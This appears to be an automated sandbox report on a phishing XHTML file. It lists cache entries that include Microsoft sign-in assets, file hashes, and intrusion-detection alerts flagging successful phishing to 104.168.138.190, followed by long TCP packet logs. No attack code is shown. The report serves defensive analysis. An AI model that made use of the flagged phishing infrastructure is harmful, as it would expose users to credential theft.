Chrome Cache Entry: 77

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32030)
Category:	downloaded
Size (bytes):	86709
Entropy (8bit):	5.367391365596119
Encrypted:	false
SSDEEP:	1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
MD5:	E071ABDA8FE61194711CFC2AB99FE104
SHA1:	F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
SHA-256:	85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
SHA-512:	53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
Malicious:	false
URL:	https://code.jquery.com/jquery-3.1.1.min.js
Preview:	/! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

Chrome Cache Entry: 78

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	downloaded
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Static File Info

General

File type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Entropy (8bit):	4.8372204620025485
TrID:	HyperText Markup Language (15004/1) 83.32% Text - UTF-8 encoded (3003/1) 16.68%
File name:	auuu.xhtml
File size:	2'926 bytes
MD5:	4df27f004583a2ee6e7d536f459ee723
SHA1:	ed50089aa75d41d314ec53148d781fa720095223
SHA256:	032073910f345c3ff0f0a0e751eec90d1dbce1e51a071fe90a2fdb8c9064b0be
SHA512:	12600b099933e6f3edbe3caf00274fdae13363d25396f61f3b4d23a8586755cef62abf36c342401986e3b75258b820220d093c05ab3a37a5904c5b783cb6085b
SSDEEP:	48:3VmIAqy8MI2QD/40WvSV0B8JTzilTSAo1+xNk:VAbi5TziEA4
TLSH:	205175584DC3C69018B582B297BAE24CFD6201476200CA44BDCDB2572FB6F8945ABBF8
File Content Preview:	...<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN".. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" lang="en">..<head>.. <meta http-

Static OLE Info

General

Document Type:	Text
Number of OLE Files:	1

OLE File "auuu.xhtml"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-24T10:13:42.120079+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	49754	104.168.138.190	443	TCP
2025-03-24T10:14:05.451751+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	49762	104.168.138.190	443	TCP
2025-03-24T10:14:16.584266+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	49776	104.168.138.190	443	TCP
2025-03-24T10:14:25.434731+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	49784	104.168.138.190	443	TCP
2025-03-24T10:15:06.085245+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	49794	104.168.138.190	443	TCP
2025-03-24T10:15:36.757342+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	49799	104.168.138.190	443	TCP
2025-03-24T10:16:07.139913+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	49804	104.168.138.190	443	TCP

Network Port Distribution

Total Packets: 466
• 8248 undefined
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 24, 2025 10:12:43.340337992 CET	49680	443	192.168.2.4	204.79.197.222
Mar 24, 2025 10:12:43.887085915 CET	49681	80	192.168.2.4	2.17.190.73
Mar 24, 2025 10:12:47.816888094 CET	49671	443	192.168.2.4	204.79.197.203
Mar 24, 2025 10:12:48.121495962 CET	49671	443	192.168.2.4	204.79.197.203
Mar 24, 2025 10:12:48.824534893 CET	49671	443	192.168.2.4	204.79.197.203
Mar 24, 2025 10:12:50.027780056 CET	49671	443	192.168.2.4	204.79.197.203
Mar 24, 2025 10:12:52.527400970 CET	49671	443	192.168.2.4	204.79.197.203
Mar 24, 2025 10:12:53.027395010 CET	49680	443	192.168.2.4	204.79.197.222
Mar 24, 2025 10:12:53.538625002 CET	49681	80	192.168.2.4	2.17.190.73
Mar 24, 2025 10:12:55.356487989 CET	49730	443	192.168.2.4	142.251.35.164
Mar 24, 2025 10:12:55.356549025 CET	443	49730	142.251.35.164	192.168.2.4
Mar 24, 2025 10:12:55.356627941 CET	49730	443	192.168.2.4	142.251.35.164
Mar 24, 2025 10:12:55.356775999 CET	49730	443	192.168.2.4	142.251.35.164
Mar 24, 2025 10:12:55.356796026 CET	443	49730	142.251.35.164	192.168.2.4
Mar 24, 2025 10:12:55.573745012 CET	443	49730	142.251.35.164	192.168.2.4
Mar 24, 2025 10:12:55.573836088 CET	49730	443	192.168.2.4	142.251.35.164
Mar 24, 2025 10:12:55.575206041 CET	49730	443	192.168.2.4	142.251.35.164
Mar 24, 2025 10:12:55.575217009 CET	443	49730	142.251.35.164	192.168.2.4
Mar 24, 2025 10:12:55.575607061 CET	443	49730	142.251.35.164	192.168.2.4
Mar 24, 2025 10:12:55.620557070 CET	49730	443	192.168.2.4	142.251.35.164
Mar 24, 2025 10:12:55.824248075 CET	49678	443	192.168.2.4	20.189.173.27
Mar 24, 2025 10:12:56.136168003 CET	49678	443	192.168.2.4	20.189.173.27
Mar 24, 2025 10:12:56.745567083 CET	49678	443	192.168.2.4	20.189.173.27
Mar 24, 2025 10:12:57.330692053 CET	49671	443	192.168.2.4	204.79.197.203
Mar 24, 2025 10:12:57.475066900 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:57.475163937 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:57.475240946 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:57.475378990 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:57.475411892 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:57.946223974 CET	49678	443	192.168.2.4	20.189.173.27
Mar 24, 2025 10:12:57.961240053 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:57.961313963 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:57.966082096 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:57.966090918 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:57.966370106 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:57.966610909 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:58.008328915 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:58.653214931 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:58.653242111 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:58.653258085 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:58.653315067 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:58.653336048 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:58.653354883 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:58.653400898 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:58.655148029 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:58.655168056 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:58.655220985 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:58.655235052 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:58.655268908 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:58.655286074 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:58.876426935 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:58.876441956 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:58.876508951 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:58.876540899 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:58.876563072 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:58.876611948 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:58.876611948 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:58.877656937 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:58.877675056 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:58.877713919 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:58.877715111 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:58.877722979 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:58.877751112 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:58.877768040 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:58.877784967 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:58.877790928 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:58.877801895 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:58.877839088 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:58.899739027 CET	49733	443	192.168.2.4	139.28.36.38
Mar 24, 2025 10:12:58.899755001 CET	443	49733	139.28.36.38	192.168.2.4
Mar 24, 2025 10:12:59.242038012 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:12:59.242077112 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:12:59.242142916 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:12:59.242366076 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:12:59.242379904 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:12:59.588000059 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:12:59.588077068 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:12:59.589114904 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:12:59.589133024 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:12:59.589404106 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:12:59.590327978 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:12:59.632344007 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.077080965 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.077099085 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.077150106 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.077198982 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.077280998 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.077317953 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.077337980 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.077650070 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.077672958 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.077708960 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.077730894 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.077744961 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.078255892 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.243647099 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.243676901 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.243746042 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.243786097 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.243803024 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.243832111 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.243850946 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.243856907 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.243870974 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.243900061 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.243942976 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.244174957 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.244189978 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.244251013 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.244267941 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.244395971 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.283654928 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.283684969 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.283746004 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.283765078 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.283862114 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.354235888 CET	49678	443	192.168.2.4	20.189.173.27
Mar 24, 2025 10:13:00.406496048 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.406526089 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.406594992 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.406620026 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.406692982 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.407089949 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.407111883 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.407159090 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.407171965 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.407188892 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.407430887 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.407461882 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.407485962 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.407529116 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.407541990 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.407560110 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.407641888 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.407762051 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.407777071 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.407835960 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.407855988 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.407922983 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.407953978 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.408365011 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.408384085 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.408436060 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.408451080 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.408510923 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.408620119 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.408638954 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.408682108 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.408694029 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.408713102 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.409157991 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.447577000 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.447602987 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.447663069 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.447691917 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.447709084 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.447770119 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.570926905 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.570955038 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.571028948 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.571072102 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.571302891 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.777980089 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.778002977 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.778043985 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.778105974 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.778199911 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:00.778245926 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.778280020 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.780930996 CET	49735	443	192.168.2.4	185.174.100.20
Mar 24, 2025 10:13:00.780968904 CET	443	49735	185.174.100.20	192.168.2.4
Mar 24, 2025 10:13:01.710371971 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:01.710427999 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:01.710508108 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:01.710732937 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:01.710752010 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:01.915210962 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:01.915286064 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:01.916371107 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:01.916378975 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:01.916623116 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:01.916868925 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:01.964335918 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.103423119 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.103877068 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.103935003 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.103960037 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.104043961 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.104073048 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.104111910 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.104123116 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.104163885 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.106295109 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.109040976 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.109087944 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.109101057 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.112191916 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.112250090 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.112262011 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.115468979 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.115545034 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.115554094 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.119189978 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.119260073 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.119268894 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.124444008 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.124495029 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.124505043 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.129385948 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.129453897 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.129465103 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.135305882 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.135360956 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.135369062 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.136423111 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.136459112 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.136466980 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.136475086 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.136523008 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.139003992 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.180757999 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.180784941 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.198776960 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.198857069 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.198873997 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.199563026 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.199609995 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.199616909 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.201786995 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.201864958 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.201872110 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.207524061 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.207572937 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.207598925 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.207607985 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.207667112 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.209999084 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.215987921 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.216044903 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.216044903 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.216064930 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.216109037 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.216114998 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.218854904 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.218928099 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.218934059 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.220164061 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.220381975 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.220388889 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.222202063 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.222253084 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.222259045 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.236026049 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.236042023 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.236107111 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.236123085 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.236167908 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.236174107 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.241414070 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.241480112 CET	49737	443	192.168.2.4	151.101.66.137
